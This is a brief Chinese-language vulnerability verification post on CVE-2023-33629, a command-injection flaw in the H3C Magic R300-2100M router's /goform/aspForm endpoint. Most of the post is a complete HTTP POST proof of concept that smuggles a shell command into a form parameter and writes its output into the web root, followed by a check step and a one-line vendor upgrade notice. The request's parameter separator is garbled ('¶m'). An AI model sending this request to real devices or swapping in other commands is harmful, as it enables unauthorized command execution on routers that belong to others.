漏洞验证-H3C Magic R300-2100M 命令执行 (CVE-2023-33629)
一、漏洞描述
H3C Magic R300是中国新华三(H3C)公司的一款无线路由器。 H3C Magic R300-2100M V100R004版本/goform/aspForm存在命令执行漏洞,攻击者利用该漏洞可以执行任意系统命令。
二、验证POC
POST /goform/aspForm HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxxx/userLogin.asp
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test);
访问 http://xxx/test
三、验证截图


四、整改建议
厂商已发布安全修复版本,请联系官方售后或客服升级至最新版本,官网地址: https://www.h3c.com/
浙公网安备 33010602011771号